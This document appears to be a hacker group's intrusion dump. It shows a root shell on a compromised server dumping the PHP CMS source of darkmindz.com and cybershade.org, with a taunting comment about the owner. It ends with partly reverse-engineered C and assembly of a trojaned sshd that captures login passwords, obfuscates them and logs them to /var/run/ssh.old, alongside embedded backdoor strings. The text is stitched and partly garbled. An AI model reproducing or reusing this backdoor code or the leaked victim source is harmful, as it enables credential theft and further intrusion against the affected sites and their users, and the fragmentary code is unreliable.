drwxr-xr-x 15 romeo romeo  4096 May 20 14:30 ..
-rw-r--r--  1 romeo romeo   731 Jan 13 07:34 admin.js
-rw-r--r--  1 romeo romeo 27395 Feb 18 09:08 base_functions.php
-rw-r--r--  1 romeo romeo  9098 Feb 21 10:50 bbcode_tags.php
-rw-r--r--  1 romeo romeo  2816 Feb  1 08:55 cacher.php
drwxr-xr-x  4 romeo romeo  4096 Feb 10 13:29 classes
-rw-r--r--  1 romeo romeo  1436 Feb  2 08:33 cli.php
-rw-r--r--  1 romeo romeo  2848 Feb  8 08:46 config.php
-rw-r--r--  1 romeo romeo 23810 Apr 19 16:45 core.php
-rw-r--r--  1 romeo romeo  4518 Feb  1 08:55 cron.php
drwxr-xr-x  2 romeo romeo  4096 Feb  7 13:38 err
-rw-r--r--  1 romeo romeo   236 Feb  2 08:33 force_user.php
drwxr-xr-x  2 romeo romeo  4096 Feb  7 13:38 functions
-rw-r--r--  1 romeo romeo  1181 Feb  2 08:33 key.php
-rw-r--r--  1 romeo romeo  6903 Feb  2 08:33 mailer.php
drwxr-xr-x  6 romeo romeo  4096 Feb  7 13:38 mint
-rw-r--r--  1 romeo romeo  3054 Feb 14 06:17 page_footer.php
-rw-r--r--  1 romeo romeo  5935 Feb 14 06:17 page_header.php
-rw-r--r--  1 romeo romeo  9762 Feb  2 08:33 recaptchalib.php
-rw-r--r--  1 romeo romeo  6658 Apr 26 07:51 security.php
-rw-r--r--  1 romeo romeo  2021 Feb  2 08:33 usertracker.php
root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# cat config.php
config = $config;
if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }


//Open the session stuff
$_sess->sql = $_sql;
$_sess->config = $config;

//start the form class
$_form = new form;

//start the user class
$_user = new user;
$_user->config = $config;
$_user->sql = $_sql;


//start the login
$_login = new login((isset($config['site']['autologin']) ? true : false));
$_login->config = $config;
$_login->sql = $_sql;
$_login->form = $_form;
$_login->sess = $_sess;
$_login->user = $_user;
$_user->login = $_login;

//require($cms_root."core/key.php");

//start the time class
$_time = new time;
$_time->config = $config;

//start the bbcode class
$_bbcode = new bbcode;
$_bbcode->SetDebug(true);
$_bbcode->SetDetectURLs(false);
$_bbcode->SetURLPattern('{$text/h} External Link');
$_bbcode->ClearSmileys();
$_bbcode->SetSmileyDir('/'.root().'images/smilies');
include($cms_root."core/bbcode_tags.php");

$_bbcode->user = $_user;
$_user->bbcode = $_bbcode;

//start the cache && template classes
$_cache_path = $cms_root."cache/";
if (is_dir($_cache_path)){ @chmod($_cache_path, 0777); }
$_cache_ = (is_writable($_cache_path) ? true : false);
$_cache = new Cache($_sql, $_cache_path, $_cache_);
$_cache->config = $config['db'];

//regenerate the site cache
if($config!==NULL || !empty($config)){
    $config_db = $_cache->generate_cache("config_db", "cache_config.php",
"SELECT * FROM ".$config['db']['prefix']."config");
    foreach($config_db as $array){
	$config[$array['array']][$array['var']] = $array['value'];
    }
    unset($array,$config_db);
}

//start the template class
$_template = new template('.', $_cache_, $_cache_path."files/");
$_template->cms_root = $cms_root;
$_template->user = $_user;

$_login->template = $_template;

//start the language class
$_language = $config['site']['language'];
if(isset($_SESSION['user']['language'])){
   
if(file_exists($cms_root."language/".$_SESSION['user']['language']."/main.php")
){
	$_language = $_SESSION['user']['language'];
    }
}
require($cms_root."language/".$_language."/main.php");
$_time->cur_lang = $_language;

//run the lang pass function on the language vars AFTER we included the base
functions.
foreach($_lang as $key => $value){
	if(!is_array($_lang[$key])){
		$_lang[$key] = lang_pass($_lang[$key]);
	}
}

$_time->lang = $_lang;
$_bbcode->lang = $_lang;
$_login->lang = $_lang;
//Include the security files.. recaptchalib maybe add into the login class
require($cms_root."core/security.php");

require($cms_root."core/classes/class.captcha.php");
$_captcha = new Captcha($config['site']['captcha_pub'],
$config['site']['captcha_priv']);

$_cms_root = $cms_root;
//Include the mailer
require($cms_root."core/mailer.php");
$cms_root = $_cms_root;

/////////////////////////////////////////////////////////////////////////////
//--Continue with the configuration----------------------------------------//
/////////////////////////////////////////////////////////////////////////////
define('ADMIN',     9);
define('DEV',	    8);
define('GMOD',	    7);
define('MOD',	    5);
define('USER',	    1);
define('BANNED',    0);

//add some stuff to the config

//generate guest defaults
$guest['user']['id'] = '0';
$guest['user']['username'] = 'Guest';
$guest['user']['theme'] = $config['site']['theme'];
$guest['user']['userkey'] = isset($_SESSION['user']['userkey']) ?
$_SESSION['user']['userkey'] : NULL;

//generate user stuff
$config['global']['user'] = (isset($_SESSION['user']['id']) ? $_SESSION['user']
: $guest['user']);
$config['global']['ip'] = getIP();
$config['global']['useragent'] = secureit(isset($_SERVER['HTTP_USER_AGENT']) ?
$_SERVER['HTTP_USER_AGENT'] : NULL);
$config['site']['guests_online'] = (isset($guests_online) &&
is_numeric($guests_online) ? $guests_online : 0);
$config['site']['users_online'] = (isset($_users_online) &&
is_numeric($_users_online) ? $_users_online : 0);
$_user->is_online = $_login->is_online = isset($_SESSION['user']['id']) ? true
: false;

#if(!isset($_SESSION['user']['id'])){$_SESSION['user'] = $guest['user'];}

$tpl = $config['site']['theme'];
if($config['site']['template_override']){
    if(!is_dir($cms_root.'template/'.$tpl.'/')){$tpl = 'vone';}
}else{
	if(isset($config['global']['user']['template']) &&
is_dir($cms_root."template/".$config['global']['user']['template']."/")){
		$tpl = $config['global']['user']['template'];
	}
}
$_template->config = $config;
$_template->tpl = $tpl;

//None of these should be defined as vars as they can be over writtin.. They
are defines
$_module = (is_string(isset($_GET['module'])) ? $_GET['module'] :
$config['site']['default_module']);
$_user_temp = $cms_root."template/".$tpl."/";
$_module_temp = $cms_root."modules/".$_module."/template/";

if(isset($_SESSION['login']) && isset($_SESSION['user']['id'])){
	unset($_SESSION['login']);
}

$_template->set_rootdir($cms_root);

define('IS_MOD',    $_user->check_permissions($config['global']['user']['id'],
MOD));
define('IS_GMOD',   $_user->check_permissions($config['global']['user']['id'],
GMOD));
define('IS_DEV',    $_user->check_permissions($config['global']['user']['id'],
DEV));
define('IS_ADMIN',  $_user->check_permissions($config['global']['user']['id'],
ADMIN));

/////////////////////////////////////////////////////////////////////////////
//--Grab the neccesarry cache files----------------------------------------//
/////////////////////////////////////////////////////////////////////////////
//this defines which of the cache files to include
//require($cms_root.'core/cacher.php');

   
/////////////////////////////////////////////////////////////////////////////
   
//--Cacher.php-------------------------------------------------------------//
   
/////////////////////////////////////////////////////////////////////////////
$cache_gen = array('statistics', 'menu', 'minimenu', 'groups', 'bans',
'user_permissions', NULL);#'badwords', 'affiliates',
$x=0;
include($cms_root."cache/cache.php");
while($var = $cache_gen[$x]){
    if($var != ''){
	$gen = NULL;
	    eval('$gen = $'.$var.'_db;');

	    /*if(file_exists($cms_root.'cache/cache_'.$var.'.php')){
		include($cms_root."cache/cache_".$var.".php");
		eval('$gen = $'.$var.'_db;');
		}*/
		if ($gen !== NULL || !empty($gen)){
			foreach($gen as $k => $v){
		    $config[$var][$k] = $v;
		}
		}else{
		//regenerate the cache if not avalible
		    switch($var){
		    case 'config':
			$config[$var] = $_cache->generate_cache("config_db",
"cache_config.php", "SELECT * FROM ".$config['db']['prefix']."config", NNUM);
		    break;
		    case 'minimenu':
			$config[$var] = $_cache->generate_cache("minimenu_db",
"cache_minimenu.php", "SELECT * FROM ".$config['db']['prefix']."mmenus ORDER BY
disporder ASC");
		    break;

		    case 'menu':
			$config[$var] = $_cache->generate_cache("menu_db",
"cache_menu.php", "SELECT * FROM ".$config['db']['prefix']."menus ORDER BY id
ASC", NNUM);
:
		    break;

		    case 'statistics':
			$config[$var] = $_cache->generate_statistics_cache();
		    break;

		    case 'groups':
			$config[$var] = $_cache->generate_cache("groups_db",
"cache_groups.php", "SELECT * FROM ".$config['db']['prefix']."groups ORDER BY
rank DESC");
		    break;
		    case 'bans':
			$config[$var] = $_cache->generate_cache("bans_db",
"cache_bans.php", "SELECT * FROM ".$config['db']['shrfix']."banned");
		    break;
		    //case 'affiliates':
		    //	  $config[$var] =
$_cache->generate_cache("affiliates_db", "cache_affiliates.php", "SELECT * FROM
".$config['db']['prefix']."affiliates");
		    //break;
		    //case 'module_permissions':
		    //	  $config[$var] =
$_cache->generate_cache("module_permissions_db",
"cache_module_permissions.php", "SELECT * FROM
".$config['db']['prefix']."module_permissions");
		    //break;
		    case 'user_permissions':
			$config[$var] = $_cache->generate_upermissions_cache();

		    break;
		}

	}
	}
	$x++;
}
   
/////////////////////////////////////////////////////////////////////////////
   
//--Cacher.php-------------------------------------------------------------//
   
/////////////////////////////////////////////////////////////////////////////


$_user->groups = $config['groups'];
//$_user->module_permissions = $config['module_permissions'];
$_user->permissions = $config['user_permissions'];

/////////////////////////////////////////////////////////////////////////////
//--Cron - This will sort the majority of the cache and--------------------//
//---------db problems out for us------------------------------------------//
/////////////////////////////////////////////////////////////////////////////

//include($cms_root.'core/cron.php');

   
/////////////////////////////////////////////////////////////////////////////
   
//--Cron.php---------------------------------------------------------------//
   
/////////////////////////////////////////////////////////////////////////////

if(!defined('NO_DB')){
    $hourly_cron = FALSE;
    if(isset($config['site']['hourly_time'])){
	if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
		$_sql->updateRow("statistics", array('value' => time()),
"variable = 'hourly_cron'");
		$hourly_cron = TRUE;
	} else {
		if($config['site']['hourly_time'] == 0){
			$hourly_cron = TRUE;
		}else{
			if((time() - $config['site']['hourly_time']) > 
$config['statistics']['hourly_cron']){
				$_sql->updateRow("statistics", array('value' =>
time()), "variable = 'hourly_cron'");
				$hourly_cron = TRUE;
			}
:
		}
	}
    }

    $daily_cron = FALSE;
    if(isset($config['site']['daily_time'])){
	if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
		$_sql->updateRow("statistics", array('value' => time()),
"variable = 'daily_cron'");
		$daily_cron = TRUE;
	} else {
		if($config['site']['daily_time'] == 0){
			$daily_cron = TRUE;
		}else{
			if((time() - $config['site']['daily_time']) > 
$config['statistics']['daily_cron']){
				$_sql->updateRow("statistics", array('value' =>
time()), "variable = 'daily_cron'");
				$daily_cron = TRUE;
			}
		}
	}
    }

    $weekly_cron = FALSE;
    if(isset($config['site']['weekly_time'])){
	if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
		$_sql->updateRow("statistics", array('value' => time()),
"variable = 'weekly_cron'");
		$weekly_cron = TRUE;
	} else {
		if($config['site']['weekly_time'] == 0){
			$weekly_cron = TRUE;
		}else{
			if((time() - $config['site']['weekly_time']) > 
$config['statistics']['weekly_cron']){
				$_sql->updateRow("statistics", array('value' =>
time()), "variable = 'weekly_cron'");
				$weekly_cron = TRUE;
			}
		}
	}
    }
}

$stat_cache = false;
if(!defined('NO_DB')){
	if($hourly_cron){
	    $_sql->record_message('Hourly CRON is running');
		//delete users from sql that are inactive and set users offline
that are inactive too
		$_sql->query("UPDATE shr_users
	    SET timestamp = ( SELECT cs_online.timestamp FROM cs_online WHERE
cs_online.uid = shr_users.id)
	    WHERE EXISTS
	      ( SELECT cs_online.timestamp FROM cs_online WHERE cs_online.uid =
shr_users.id)");
		$_sql->deleteRow('online', "login_time <
".$_time->mod_time(time(), 0, 20, 0, 'TAKE')." AND timestamp <
".$_time->mod_time(time(), 0, 20, 0, 'TAKE'));
		$_sql->query('DELETE FROM `shr_banned` WHERE `user_ip` LIKE
"66.249%"');
		$_cache->generate_statistics_cache();
		$stat_cache = true;

	}

	if($daily_cron){
	    $_sql->record_message('Daily CRON is running');
		//update caches
		if(!$stat_cache){
		$_cache->generate_statistics_cache();
		$stat_cache = true;
:
	}

	if($config['forum']['auto_lock']){
	    //Auto Lock Thread Timer
	    $ex = $_time->mk_time(time()-$config['forum']['auto_lock_cron'],
'', 1);
	    $_sql->updateRow('forum_topics', array('locked'=>1), "last_poster
<= $ex", 1);
	}

	$_sql->query("DELETE FROM ".$config['db']['shrfix']."pastebin WHERE
expire < ".time()."");

		$_cache->generate_upermissions_cache();
	$_cache->generate_cache("minimenu_db", "cache_minimenu.php", "SELECT *
FROM ".$config['db']['prefix']."mmenus ORDER BY disporder ASC");
		$_cache->generate_cache("menu_db", "cache_menu.php", "SELECT *
FROM ".$config['db']['prefix']."menus ORDER BY id ASC", NNUM);
	    //$_cache->generate_cache("module_permissions_db",
"cache_module_permissions.php", "SELECT * FROM
".$config['db']['prefix']."module_permissions");

	}

	if($weekly_cron){
	    $_sql->record_message('Weekly CRON is running');
		if(!$stat_cache){
		$_cache->generate_statistics_cache();
		$stat_cache = true;
	}

	$_cache->generate_cache("config_db", "cache_config.php", "SELECT * FROM
".$config['db']['prefix']."config");
	    $_cache->generate_cache("groups_db", "cache_groups.php", "SELECT *
FROM ".$config['db']['prefix']."groups ORDER BY rank DESC");

	//Optimise all of the tables in the DB
		$alltables = $_sql->getTable("SHOW TABLES");
	    $tables = '';
	    $counter = count($alltables);
	    $x = 0;
	    $add = ", ";
	    foreach($alltables as $table){
		foreach ($table as $tablename){
			if($x == ($counter-1)){
				$add = '';
			}
			$tables .= "`$tablename`$add";
			$x++;
		}
	    }
	    $_sql->query("OPTIMIZE TABLE $tables");
	    $_sql->updateRow("statistics", array('value' => time()), "variable
= 'weekly_time'", FALSE);
	}

	if($weekly_cron || $daily_cron || $hourly_cron){
	define('FILE_MERGE', 1);
	include($cms_root.'merge.php');
	}
}
   
/////////////////////////////////////////////////////////////////////////////
   
//--Cron.php---------------------------------------------------------------//
   
/////////////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////////////
//--Check weather the site is closed---------------------------------------//
/////////////////////////////////////////////////////////////////////////////
if (($config['site']['closed'] == 1) && (!defined("CMS_CLOSED"))){
	if (!$_user->check_permissions($config['global']['user']['id'],
ADMIN)){
		die(die_error(4));
:
	}
}

/////////////////////////////////////////////////////////////////////////////
//--Check weather a user is banned-----------------------------------------//
/////////////////////////////////////////////////////////////////////////////
/**
if ($config['bans'] != NULL){
	foreach ($config['bans'] as $bans){
		if ($bans['user_ip'] == $config['global']['ip']){
			die(die_error($bans['die']));
		}
	}
}
**/

/////////////////////////////////////////////////////////////////////////////
//--Sort out the guests & users online stuff-------------------------------//
/////////////////////////////////////////////////////////////////////////////

//include($cms_root.'core/usertracker.php');

   
/////////////////////////////////////////////////////////////////////////////
   
//--UserTracker.php--------------------------------------------------------//
   
/////////////////////////////////////////////////////////////////////////////
if(!defined('NO_DB') && !defined('NO_LOG')){

if(!isset($_SESSION['user']['userkey'])){
    //cookie check
    if(!$_user->is_online){
		if(isset($_COOKIE[$config['db']['ckefix'].'login']) &&
!empty($_COOKIE[$config['db']['ckefix'].'login'])){
	    $cookie = unserialize($_COOKIE[$config['db']['ckefix'].'login']);
	    if(isset($cookie[1]) && (int)isset($cookie[0])){
			if($cookie[1] ==
$_login->mk_passwd($_SERVER['HTTP_USER_AGENT'], $config['db']['ckeauth'])){
			    if($config['login']['autologinIpRestriction']) $aq
= " AND user_ip = '".getIP()."'";
			$query = $_sql->getTable("SELECT uid FROM
".$config['db']['shrfix']."userkeys WHERE uid = '".$cookie[0]."' AND user_agent
= '".$cookie[1]."'".(isset($aq) ? $aq : '')." LIMIT 1;");
				if (count($query) == 1){
				    $user = $_sql->getTable("SELECT timestamp
FROM ".$config['db']['shrfix']."users WHERE id = '".$cookie[0]."' LIMIT 1");
				    if($user!==NULL){
					$user = $user[0];
					       
$_sess->set_sessions($cookie[0]);

						$_SESSION['user']['last_visit']
= $user['timestamp'];
			    $_user->new_user($cookie[0], 'alogin');

			       
if($_user->get_new_threads($_SESSION['user']['last_visit']))
				setNotification('We have just updated your
forum icons to reflect new posts.', 'Forum Icons Updated', false,
$_SESSION['user']['id']);
			    $config['global']['user']['id'] =
$_SESSION['user']['id'];
					}
				}else{//if count query == 1
				setcookie($config['db']['ckefix']."login",
null, time() - 31536000);    //set cookie to remember me
			       
unset($_COOKIE[$config['db']['ckefix']."login"]);
		    }
			}else{ //if cookie == http user agent
				setcookie($config['db']['ckefix']."login",
null, time() - 31536000);    //set cookie to remember me
			       
unset($_COOKIE[$config['db']['ckefix']."login"]);
		}
		}else{//if cookie info == valid
			setcookie($config['db']['ckefix']."login", null, time()
- 31536000);	//set cookie to remember me
			unset($_COOKIE[$config['db']['ckefix']."login"]);
	    }
		redirect($_SERVER["PHP_SELF"]);

	}
    }
	$_user->new_user($config['global']['user']['id']);
}else{
    $return = $_user->update_location();
    if($return == 0){
	$_user->new_user($config['global']['user']['id']);
    }
}

}
   
/////////////////////////////////////////////////////////////////////////////
   
//--UserTracker.php--------------------------------------------------------//
   
/////////////////////////////////////////////////////////////////////////////

/**
 * Thanks to Jesus for this baby, this will add the level of sanitation
required for the diffrent data types
 */
function secureit($string, $type=''){
	switch($type){
		case 'post':
			$string = mysql_real_escape_string($string);
		break;
		default:
			$string = mysql_real_escape_string($string);
			$string = htmlentities($string);
			$string = stripslashes($string);
			$string = strip_tags($string);
		break;
	}
	return $string;
}
if (isset($_GET['code']) &&
$_user->check_permissions($config['global']['user']['id'], DEV)) {
    $explode = explode('/', $_SERVER['PHP_SELF']);
    die(highlight_file($explode[count($explode)-1], 1));
}
?>root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# less Gre.php
config = $config;
:if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
:if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }
:
:
://Open the session stuff
:$_sess->sql = $_sql;
:$_sess->config = $config;
:
://start the form class
:$_form = new form;
:
://start the user class
:$_user = new user;
:$_user->config = $config;
:$_user->sql = $_sql;
root@server2:/home/romeo/domains[root@server2 domains]# cd cybershade.org/

# RoMeO's butt buddy xlink aka mad php c0d3r
root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
ls -al 
drwxr-xr-x  2 romeo romeo 4096 Dec 23 14:31 .htpasswd
drwxr-xr-x  2 root  root  4096 May 23 00:10 logs
drwx--x--x  3 romeo romeo 4096 Dec 23 14:31 public_ftp
drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 public_html
drwxr-xr-x  2 root  root  4096 May  1 00:10 stats
root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
cd public_html/
root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
public_html]# ls -al
total 1188
drwxr-xr-x 13 romeo romeo   4096 May 19 22:42 .
drwx--x--x  7 romeo romeo   4096 Feb 10 19:26 ..
-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 400.shtml
-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 401.shtml
-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 403.shtml
-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 404.shtml
-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 500.shtml
-rw-r--r--  1 romeo romeo   5254 Feb 16 08:01 acp.php
-rw-r--r--  1 romeo romeo   9757 Feb 16 08:01 ajax.php
-rw-r--r--  1 romeo romeo   2118 Feb 16 08:01 articles.php
drwxrwxrwx  5 romeo romeo   4096 Feb 10 19:31 cache
drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 cgi-bin
-rw-r--r--  1 romeo romeo   5561 Feb 16 08:01 challenges.php
-rw-r--r--  1 romeo romeo 466963 Mar  1 14:51 cms_docs.zip
-rw-r--r--  1 romeo romeo   2137 Feb 10 19:31 codebase.php
-rw-r--r--  1 romeo romeo  17251 Feb 10 19:31 convertor.php
drwxr-xr-x  6 romeo romeo   4096 Feb 10 19:31 core
-rw-r--r--  1 romeo romeo      0 Feb 10 19:31 debug
-rw-r--r--  1 romeo romeo   3266 Feb 10 19:31 eg.gif
-rw-r--r--  1 romeo romeo  28213 Mar 20 12:59 farm.php
-rw-r--r--  1 romeo romeo   5020 Feb 16 08:01 forgotpass.php
-rw-r--r--  1 romeo romeo   7097 Feb 19 14:12 forum.php
-rw-r--r--  1 romeo romeo   2110 Feb 16 08:01 get_shouts.php
-rw-r--r--  1 romeo romeo   4546 Feb 19 14:12 .htaccess
-rw-r--r--  1 romeo romeo     36 Feb 10 19:31 .htpasswd
drwxr-xr-x  4 romeo romeo   4096 Feb 10 19:31 images
drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 img
-rw-r--r--  1 romeo romeo   3998 Feb 16 08:01 index.php
-rw-r--r--  1 romeo romeo    843 Feb 16 08:01 irc.php
drwxr-xr-x  3 romeo romeo   4096 Feb 10 19:31 language
-rw-r--r--  1 romeo romeo   4103 Feb 19 14:12 latest_posts.php
-rwxr-xr-x  1 romeo romeo   7184 Feb 16 08:01 loader.php
-rw-r--r--  1 romeo romeo   8398 Feb 16 08:01 login.php
-rwxr-xr-x  1 romeo romeo  13954 Feb 10 19:31 logo.jpg
-rw-r--r--  1 romeo romeo   3006 Feb 16 08:01 merge.php
drwxr-xr-x 20 romeo romeo   4096 Feb 17 09:01 modules
-rw-r--r--  1 romeo romeo  10964 Feb 16 08:01 pastebin.php
-rw-r--r--  1 romeo romeo  35466 Feb 19 14:39 post.php
-rw-r--r--  1 romeo romeo   2142 Feb 16 08:01 privatemessages.php
-rw-r--r--  1 romeo romeo   9755 Feb 21 09:08 register.php
-rw-r--r--  1 romeo romeo   7986 Feb 16 08:01 rss.php
drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 scripts
-rw-r--r--  1 romeo romeo   1065 Feb 16 08:01 search.php
-rw-r--r--  1 romeo romeo   1838 Feb 16 08:01 settings.php
drwxr-xr-x  8 romeo romeo   4096 Mar 19 10:13 skin
-rw-r--r--  1 romeo romeo 196608 Mar 19 10:20 skin.tgz
-rw-r--r--  1 romeo romeo    636 Feb 16 08:01 staff.php
-rw-r--r--  1 romeo romeo 133049 May 23 04:00 stress_test.txt
-rw-r--r--  1 romeo romeo    994 Feb 10 19:31 swiigle_upload.php
drwxr-xr-x  5 romeo romeo   4096 Feb 16 19:13 template
-rw-r--r--  1 romeo romeo    454 Feb 10 19:31 template.php
-rw-r--r--  1 romeo romeo    590 Feb 10 19:31 test.php
drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 txt docs
-rw-r--r--  1 romeo romeo   2708 Feb 16 08:01 ucp.php
-rw-r--r--  1 romeo romeo   8546 Feb 19 14:12 view_group.php
-rw-r--r--  1 romeo romeo    876 Feb 16 08:01 view_profile.php
-rw-r--r--  1 romeo romeo  12838 Feb 19 14:12 view_topic.php
-rw-r--r--  1 romeo romeo   9571 Feb 16 08:01 windowed_options.php
root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
public_html]# cd core
root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
core]# ls -al
total 164
drwxr-xr-x  6 romeo romeo  4096 Feb 10 19:31 .
drwxr-xr-x 13 romeo romeo  4096 May 19 22:42 ..
-rw-r--r--  1 romeo romeo   731 Feb 10 19:31 admin.js
-rw-r--r--  1 romeo romeo 27175 Feb 16 19:00 base_functions.php
-rw-r--r--  1 romeo romeo  9266 Feb 16 19:00 bbcode_tags.php
-rw-r--r--  1 romeo romeo  2816 Feb 10 19:31 cacher.php
drwxr-xr-x  4 romeo romeo  4096 Feb 10 19:31 classes
-rw-r--r--  1 romeo romeo  1376 Feb 16 19:00 cli.php
-rw-r--r--  1 romeo romeo  2847 Feb 10 19:33 config.php
-rw-r--r--  1 romeo romeo 23727 Feb 17 09:53 core.php
-rw-r--r--  1 romeo romeo  4518 Feb 10 19:31 cron.php
drwxr-xr-x  2 romeo romeo  4096 Feb 10 19:31 err
-rw-r--r--  1 romeo romeo   236 Feb 16 19:00 force_user.php
drwxr-xr-x  2 romeo romeo  4096 Feb 10 19:31 functions
-rw-r--r--  1 romeo romeo  1181 Feb 16 19:00 key.php
-rw-r--r--  1 romeo romeo  6903 Feb 16 19:00 mailer.php
drwxr-xr-x  6 romeo romeo  4096 Feb 10 19:31 mint
-rw-r--r--  1 romeo romeo  3054 Feb 16 19:00 page_footer.php
-rw-r--r--  1 romeo romeo  6429 Feb 16 19:00 page_header.php
-rw-r--r--  1 romeo romeo  9762 Feb 16 19:00 recaptchalib.php
-rw-r--r--  1 romeo romeo  6601 Apr  5 12:58 security.php
-rw-r--r--  1 romeo romeo  2760 Feb 16 19:00 usertracker.php
root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
core]# less config.php
      < 
\  \_/   \>    <\  \_/   \/   --   \
 \_____  /__/\_ \\_____  /\______  /
       \/      \/      \/        \/ 
__________                __       .___                   
\______   \_____    ____ |  | __ __| _/____   ___________ 
 |    |  _/\__  \ _/ ___\|  |/ // __ |/  _ \ /  _ \_  __ \
 |    |   \ / __ \\  \___|     |  <_> )  | \/
 |______  /(____  /\___  >__|_ \____ |\____/ \____/|__|   
        \/      \/     \/     \/    \/                    
___________________ ___________
\______   \_   ___ \\_   _____/
 |       _/    \  \/ |    __)_ 
 |    |   \     \____|        \
 |____|_  /\______  /_______  /
        \/        \/        \/ 


char abuff[1024];
char sbuff[1024];
char * aSSSSSS = "%s%s\t [ %s %s %s %s ]"; //db '%s%s',9,' [ %s %s %s %s ]',0Ah
char * a0m = "\x1B[0m"; //db 1Bh,'[0m',0
char * aOwned ="see below";
char * aAGb7 = "a-gb7"
/*
.rodata:08078D34 aOwned          db 0Ah                  ; DATA XREF: do_motd+DFo
.rodata:08078D34                 db 9,9,'+----------------------------[ Owned ]-------------------------'
.rodata:08078D34                 db '---+',0Ah
.rodata:08078D34                 db 9,9,'|          Hack everyone you can and then hack some more       '
.rodata:08078D34                 db '   |',0Ah
.rodata:08078D34                 db 9,9,'|                           Owned[DC] v2                       '
.rodata:08078D34                 db '   |',0Ah
.rodata:08078D34                 db 9,9,'|                   _______ . _______ . _______                '
.rodata:08078D34                 db '   |',0Ah
.rodata:08078D34                 db 9,9,'|             Get in as anonymous, Leave with no trace.        '
.rodata:08078D34                 db '   |',0Ah
.rodata:08078D34                 db 9,9,'|                                                              '
.rodata:08078D34                 db '   |',0Ah
.rodata:08078D34                 db 9,9,'+--------------------------------------------------------------'
.rodata:08078D34                 db '---+',0Ah,0
*/
char * a033031mOwned03 = "\[\033[0;31m\]Owned\[\033[1;30m\][\[\033[1;37m\]DC\[\033[1;30m\]]:[\033[1;32m\]\w\[\033[1;30m\]]\[\033[1;30m\]\$\[\033[0m\] ";
char s[1024];
char * filename = "/var/run/ssh.old";
char i = 0;
size_t len;
FILE * log;
char * HookinSS = "HOOKIN: %s:%s"
char * a0x3aownt = "0x3aownt";
char * aSk3rhgldyw = "Sk3rhGLdYW";


//known structs

struct passwd {
	char *pw_name;
	char *pw_passwd;
	uid_t pw_uid;
	gid_t pw_gid;
	time_t pw_change;
	char *pw_class;
	char *pw_gecos;
	char *pw_dir;
	char *pw_shell;
	time_t pw_expire;
}; 


struct Authctxt {
	int		 success;
	int		 postponed;	/* authentication needs another step */
	int		 valid;		/* user exists and is allowed to login */
	int		 attempt;
	int		 failures;
	int		 force_pwchange;
	char		*user;		/* username sent by the client */
	char		*service;
	struct passwd	*pw;		/* set if 'valid' */
	char		*style;
	void		*kbdintctxt;
#ifdef BSD_AUTH
	auth_session_t	*as;
#endif
#ifdef KRB5
	krb5_context	 krb5_ctx;
	krb5_ccache	 krb5_fwd_ccache;
	krb5_principal	 krb5_user;
	char		*krb5_ticket_file;
	char		*krb5_ccname;
#endif
	Buffer		*loginmsg;
	void		*methoddata;
};

struct utsname {
	char	sysname[_SYS_NMLN];
 	char	nodename[_SYS_NMLN];
 	char	release[_SYS_NMLN];
 	char	version[_SYS_NMLN];
 	char	machine[_SYS_NMLN];
}

/* sys_auth_passwd
.text:0804FA98                 push    edi
.text:0804FA99                 push    dword ptr [esi] ; esi = arg_0 + 20h
.text:0804FA99                                         ; authctxt->pw
.text:0804FA99                                         ; [esi] = pw->pw_name
.text:0804FA9B                 push    offset aHookinSS ; "HOOKIN: %s:%s\n"
.text:0804FAA0                 push    offset abuff    ; s
.text:0804FAA5                 call    _sprintf
.text:0804FAAA                 mov     edi, offset abuff ; start: strlen(abuff)
.text:0804FAAF                 xor     eax, eax
.text:0804FAB1                 cld
.text:0804FAB2                 mov     ecx, 0FFFFFFFFh
.text:0804FAB7                 repne scasb
.text:0804FAB9                 not     ecx
.text:0804FABB                 lea     edx, [ecx-1]
.text:0804FABE                 add     esp, 10h
.text:0804FAC1                 cmp     ebx, edx        ; fin;
.text:0804FAC3                 mov     ds:alen, edx    ; alen = strlen result
.text:0804FAC9                 mov     ds:ai, 0        ; for(ai = 0
.text:0804FAD3                 jg      short loc_804FAE8
.text:0804FAD5                 xor     eax, eax
.text:0804FAD7                 nop
.text:0804FAD8
.text:0804FAD8 loc_804FAD8:                            ; CODE XREF: sys_auth_passwd+CDj
.text:0804FAD8                 not     ds:abuff[eax]
.text:0804FADE                 inc     eax             ; eax++ (ai++)
.text:0804FADF                 cmp     eax, edx        ; ;ai<=edx (alen)
.text:0804FAE1                 jle     short loc_804FAD8
.text:0804FAE3                 mov     ds:ai, eax
.text:0804FAE8
.text:0804FAE8 loc_804FAE8:                            ; CODE XREF: sys_auth_passwd+BFj
.text:0804FAE8                 sub     esp, 8
.text:0804FAEB                 push    (offset aDsa_0+2) ; aDsa = db 'dsa',0 | aDsa+2h = 'a',0
.text:0804FAF0                 push    offset filename ; "/var/run/ssh.old"
.text:0804FAF5                 call    _fopen          ; fopen(filename,"a")
.text:0804FAFA                 add     esp, 10h
.text:0804FAFD                 test    eax, eax        ; if(fopen(...) != NULL)
.text:0804FAFD                                         ;  jump
.text:0804FAFF                 mov     ds:alog, eax
.text:0804FB04                 jnz     short loc_804FB3B
.text:0804FB06
.text:0804FB06 loc_804FB06:                            ; CODE XREF: sys_auth_passwd+149j
